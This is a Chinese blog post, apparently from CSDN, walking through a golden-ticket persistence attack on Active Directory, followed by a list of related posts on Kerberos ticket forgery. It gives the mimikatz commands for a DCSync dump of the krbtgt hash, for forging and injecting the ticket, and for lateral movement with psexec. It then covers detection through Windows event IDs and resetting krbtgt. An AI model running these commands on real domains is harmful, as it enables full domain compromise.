【域权限维持】-黄金票据

原创 已于 2022-11-07 17:42:47 修改 · 1.7k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #网络安全 #系统安全

于 2022-11-07 17:38:23 首次发布

前提:可以登录到域控制器获取krbtgt账户的hash

官方重置krbtgt账户密码的脚本

https://github.com/microsoft/New-KrbtgtKeys.ps1

(Active Directory中对定期迭代的帐户防止密码重用,默认密码策略被设置为记住24个历史密码,而且至少也要迭代一次保存于电脑帐户。即使密码已更新,也会继续使用前面的密码散列进行身份验证),如果不是很紧急的话最好不要连续修改2次密码,这样会引起域内工作不正常,最好是10个小时以后再修改第二次krbtgt的密码

一、在域控机器上使用管理员权限的CMD 启动mimikatz

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:wlaq.com /user:krbtgt" exit >> 1.txt

在这里插入图片描述

二、终端上使用mimikatz,指定随意指定一个用户名,注册登录

"kerberos::golden /domain:wlaq.com /sid:***** /aes256:***** /user:***** /ptt"

mimikatz.exe "privilege::debug" "kerberos::golden /domain:wlaq.com /sid:***** /aes256:***** /user:***** /ticket:gold.kirbi" exit >> 2.txt

在这里插入图片描述

mimikatz.exe "privilege::debug" "kerberos::ptt C:\User\user001\Desktop\mimikatz\gold.kirbi05" exit >> 3.txt

在这里插入图片描述

三、退出该界面,使用klist查看票据信息,如果出现指定的用户的票据既可以访问域控,可打开新的管理员权限的cmd

在这里插入图片描述

四、测试ipc共享连接

在这里插入图片描述
在这里插入图片描述

五、上传文件到域控

在这里插入图片描述
在这里插入图片描述

六、使用psexec获取的交互式命令行

在这里插入图片描述

七、清除票据信息

cmd  klist purge

微软的MS-KILE解释:Kerberos V5不提供对TGS请求的帐户撤销检查,只要TGT有效,即使该帐户已被删除,TGT更新和服务票据也可以发布。KILE提供了一个可以将利用时间限制在较短的时间内(20分内)。当TGT大于20分钟时,KILE KDC需要在域中检查账户

正常来说认证访服务的流程是先4768(TGT)-4769(TGS)-4624(logon),但是黄金票据攻击的话只会有4769-4624,因为TGT已经离线生成了。但是kerberos票据的有效期一般是4个小时(特殊组的用户)或者是10个小时,也就是说TGT在之前申请过了就可以保留4-10个小时之间那么这个时间触发攻击还是只有4769-4624,最好还是流量检测黄金票据攻击。

八、攻击检测

1、与运维同事约定不适用administrator的账户用于平时工作,进行账号权限分离。监控域控日志administrator账户的使用。域内任何用户的SID都是唯一的。【若有能力修改默认mimikatz的RID,且生成的票据验证成功登录域控,可绕过该检测】

Windows EventId 4672
在这里插入图片描述

2、共享横向移动监控,在获取到黄金票据后,大多数攻击者都会尝试利用dir命令访问域控查看文件,此时可以监控共享日志

Windows EventId 5140
监控日志满足以下:
a、默认逻辑共享:C$ 、 D$ 、E$
系统目录共享:admin$
b、使用的账户包含统一的前缀(建议运维同事将域管账户统一命名加上前缀,如admin_),在描述上注释哪个管理员使用,便于安全人员对日志进行采集监控

注:此文章参考了很多的网络上的其他文章!!!

域权限维持黄金票据和白金票据
lza20001103的博客
09-26 1539
黄金票据和白金票据 前言 某老哥的一次面试里问到了这个问题,故来做一番了解 该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程中的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景中都可以进行此类攻击 一、Kerberos协议 首先了解下Kerberos协议,windows域认证常用协议,也是黄金票据和白银票据的攻击场景 大致流程如下:
红队内网攻防渗透:内网渗透之内网对抗:权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据
HACKONE的博客
06-25 715
蓝宝石票据与钻石票据类似,票据不是伪造的,而是通过请求后获得的合法票据。在蓝宝石票据中,高权限用户PAC是通过S4U2Self+U2U获得的,然后该PAC会替换原来的PAC,由于该票据是完全合法元素组合起来的,所以是最难检测的票据。白银票据是伪造的 Kerberos Ticket Grant Service (TGS) 票证,银票仅允许攻击者伪造特定服务的票证授予服务 (TGS) 票据。白银票据所需的利用条件和黄金票据是相同的,只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)
【内网学习笔记】28、黄金票据
TeamsSix 的 优快云 空间
09-27 595
0、前言 RT 在利用黄金票据(Golden Ticket)进行 PTP 票据传递时,需要先知道以下信息: 伪造的域管理员用户名 完整的域名 域 SID krbtgt 的 NTLM Hash 或 AES-256 值 其中 krbtgt 用户是域自带的用户,被 KDC 密钥分发中心服务所使用,属于 Domain Admins 组。 在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的,因此如果知道了 krbtgt 用户的 NTLM Hash 或者 AES-256 值,就可以伪造域内任意用户的身
域内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 669
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
【内网渗透】——MS14-068漏洞利用以及复现黄金票据
最新发布
weixin_73595045的博客
05-11 1217
本文详细介绍了MS14-068漏洞的利用与复现过程,重点分析了Kerberos认证机制及其漏洞原理。文章首先搭建了实验环境,包括域控制器和用户机,并详细描述了Kerberos认证流程,特别是TGT和ST的获取过程。接着,文章深入探讨了PAC(特权属性证书)的作用及其在Kerberos认证中的重要性。随后,文章详细阐述了MS14-068漏洞的利用思路,包括如何伪造PAC并利用该漏洞提升域用户权限。最后,文章通过实验步骤展示了如何使用PyKEK工具生成高权限票据,并通过Mimikatz将票据注入内存,成功实现权
域中黄金票据
https://www.cnblogs.com/zpchcbd/
09-11 1369
黄金票据(golden ticket):伪造票据授予票据(TGT),也被称为认证票据krbtgt账户:每个域控制器都有一个“krbtgt”的用户账户,是KDC的服务账户,用来创建票据授予服务(TGS)加密的密钥。 0x00 金票据利用条件: 域控中krbtgt账户NTLM密码哈希 域中的sid值 一台域中主机 与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限,因为常见...
黄金票据之拿shell——超详细步骤
xwj1590的博客
11-12 3848
黄金票据的意思是,当攻击者呢呢个够获取打牌krbtgt的HTLM HASH后,攻击者就可以伪造一张票据授权票,去伪造正域内的任意用户访问到域内kerberos认证的所有服务资源。 域搭建环境: 域名:taozhi.online 域控(server2008): 域内机器(win7): 所需条件: 域名称:taozhi.online 域SID: 域控的krntgt账户的hash值 1.在域控机器上,查看域用户net user,确认是否有krbtgt账户。 2.打开mimikatz,执行p
黄金票据维持域控权限
inslight的博客
09-22 266
黄金票据
域权限维持——黄金票据和白金票据
cxrpty的博客
04-03 2083
获得域控得用户密码时,为了防止密码被改,需要进行权限维持 实验一:黄金票据 实验原理:ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 实验条件: 1.域名称 2.域的SID 值 3.域的KRBTGT账户NTLM密码哈希或者aes-256值 4.伪造...
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 944
内网安全之权限维持
域渗透--金银票据问题
Vdieoo的博客
10-30 1322
票据 伪造凭据,提升域内普通用户权限 以admin用户登入任意一台域内主机 收集域信息 命令有:net config workstation,可以看到域名为:cyberpeace。 nltest /dsgetdc:域名,可以看到域控主机名为:scene。 以admin权限运行mimikztz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt 找...
黄金票据制作
m0_70613012的博客
04-02 426
三个靶场的操作系统分别为Windows Server 2016、Windows 10和Windows 7。其中Windows Server 2016担任域控制器的角色,而Windows 10和Windows 7则作为域成员机。在域中有三个用户分别为:demo1、demo2和demo3。使用黄金票据前提是你已经控制了整个域的域控制器。使用mimikatz中的kerberos::golden模块创建黄金票据,该票据的格式为.kirbi。首先我们先登录一个域的普通账户,然后尝试通过dir访问域控的共享文件夹。
黄金票据制作-新手入门
weixin_42109829的博客
12-27 2561
0x01 前言 相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户 0x02 黄金票据krbtgt 用户的关系 ​ Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票
Mimikatz 的使用(黄金票据的制作)
jzm__123的博客
12-18 1030
在他的工作范围内,他可以获取当前windows 的密码哈希值或者sid 和等来合成黄金票据的所需材料,这使我们的电脑十分危险,如果让我们的电脑遭受了他的攻击那么我们的会遭受到信息泄露,或者被注入病毒等一系列问题。孤独没有什么反义词,但他的近义词是自由,人生成功的道路上充满了孤独,那么也同样告诉你,你离成功后的自由不远了。黄金票据,打个比方,在生活中有一种非常牛的卡,一般存在于富豪手中,有了他,那么你就可以无所不能。username hacker (冒充的用户)3测试用的用户名(虚构的,或者用来冒充的)
域渗透之黄金票据大法 本地实验
broing55的博客
04-03 1520
黄金票据大法 图示: 黄金票据 ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 黄金票据的条件要求: 1.域名称 hacker.com 2.域的SID 值 S-1-5-21-1854149318-4101476522-18457...
黄金票据的制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
内网横向——域渗透之黄金票据复现
ytdd66的博客
04-03 2125
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其中KDC服务默认会安装在一个域的域控中,而Client和Server为域内的用户或者是服务,如HTTP服务,SQL服务。在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定。
一篇文章看懂Kerberos协议
qq_29948489的博客
12-14 1386
kerberos是一种计算机网络认证协议,他能够为网络中通信的双方提供严格的身份验证服务,确保通信双方身份的真实性和安全性。不同于其他网络服务,kerberos协议中不是所有的客户端向想要访问的网络服务发起请求,他就能够建立连接然后进行加密通信。而是在发起服务请求后必须先进行一系列的身份认证,包括客户端和服务端两方的双向认证,只有当通信双方都认证通过对方身份之后,才可以互相建立起连接,进行网络通信。
内网安全:PTH、PTK与PTT哈希票据攻击策略解析
MS14-068允许攻击者获取具有更高权限的Golden Ticket(黄金票据)和Silver Ticket(白银票据),这些技术主要用来维持攻击者的权限并绕过正常认证流程。 6. **MS14-068漏洞影响**: 这个漏洞使得域内攻击者能够获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值